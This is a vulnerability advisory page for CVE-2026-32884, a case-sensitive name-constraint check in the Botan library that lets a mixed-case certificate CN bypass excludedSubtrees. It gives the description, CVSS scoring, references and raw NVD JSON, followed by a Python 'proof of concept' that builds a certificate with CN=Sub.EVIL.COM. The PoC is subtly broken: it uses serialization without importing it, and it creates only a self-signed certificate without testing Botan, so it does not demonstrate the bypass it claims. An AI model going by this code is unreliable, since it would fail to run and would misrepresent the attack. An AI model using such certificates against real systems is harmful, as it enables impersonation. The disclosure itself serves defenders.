CVE-2026-32884

Description

Botan is a C++ cryptography library. Prior to version 3.11.0, during processing of an X.509 certificate path using name constraints which restrict the set of allowable DNS names, if no subject alternative name is defined in the end-entity certificate Botan would check that the CN was allowed by the DNS name constraints, even though this check is technically not required by RFC 5280. However this check failed to account for the possibility of a mixed-case CN. Thus a certificate with CN=Sub.EVIL.COM and no subject alternative name would bypasses an excludedSubtrees constraint for evil.com because the comparison is case-sensitive. This issue has been patched in version 3.11.0.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:* - VULNERABLE

Botan < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-32884
# This script demonstrates creating a certificate with a mixed-case CN
# that bypasses an excludedSubtrees constraint in vulnerable Botan versions.

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
import datetime

# 1. Generate a private key for the malicious certificate
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# 2. Create a certificate with a mixed-case Common Name (CN)
# The CN uses uppercase letters to bypass case-sensitive checks
subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
    x509.NameAttribute(NameOID.COMMON_NAME, u"Sub.EVIL.COM"),  # Vulnerability Trigger
])

# 3. Build the certificate without Subject Alternative Name (SAN)
cert = x509.CertificateBuilder().subject_name(
    subject
).issuer_name(
    issuer
).public_key(
    key.public_key()
).serial_number(
    x509.random_serial_number()
).not_valid_before(
    datetime.datetime.utcnow()
).not_valid_after(
    datetime.datetime.utcnow() + datetime.timedelta(days=365)
).sign(key, hashes.SHA256())

# 4. Save the generated certificate
with open("bypass_cert.pem", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))

print("Certificate generated: CN=Sub.EVIL.COM")
# When verified against a constraint excluding 'evil.com', 
# vulnerable Botan versions will accept this due to case sensitivity.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32884
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32884
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32884/
[4] VulDB https://vuldb.com/cve/CVE-2026-32884
[5] https://github.com/randombit/botan/security/advisories/GHSA-7c3g-7763-ggj5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32884", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:10.093", "lastModified": "2026-04-13T13:52:26.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Botan is a C++ cryptography library. Prior to version 3.11.0, during processing of an X.509 certificate path using name constraints which restrict the set of allowable DNS names, if no subject alternative name is defined in the end-entity certificate Botan would check that the CN was allowed by the DNS name constraints, even though this check is technically not required by RFC 5280. However this check failed to account for the possibility of a mixed-case CN. Thus a certificate with CN=Sub.EVIL.COM and no subject alternative name would bypasses an excludedSubtrees constraint for evil.com because the comparison is case-sensitive. This issue has been patched in version 3.11.0."}, {"lang": "es", "value": "Botan es una biblioteca de criptografía C++. Antes de la versión 3.11.0, durante el procesamiento de una ruta de certificado X.509 utilizando restricciones de nombre que restringen el conjunto de nombres DNS permitidos, si no se define un nombre alternativo del sujeto en el certificado de entidad final, Botan verificaría que el CN estaba permitido por las restricciones de nombre DNS, aunque esta verificación técnicamente no es requerida por el RFC 5280. Sin embargo, esta verificación no tuvo en cuenta la posibilidad de un CN con mayúsculas y minúsculas. Así, un certificado con CN=Sub.EVIL.COM y sin nombre alternativo del sujeto eludiría una restricción de excludedSubtrees para evil.com porque la comparación distingue entre mayúsculas y minúsculas. Este problema ha sido parcheado en la versión 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.11.0", "matchCriteriaId": "DBC9FF6C-805F-482E-9A45-8D1EC323BA96"}]}]}], "references": [{"url": "https://github.com/randombit/botan/security/advisories/GHSA-7c3g-7763-ggj5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}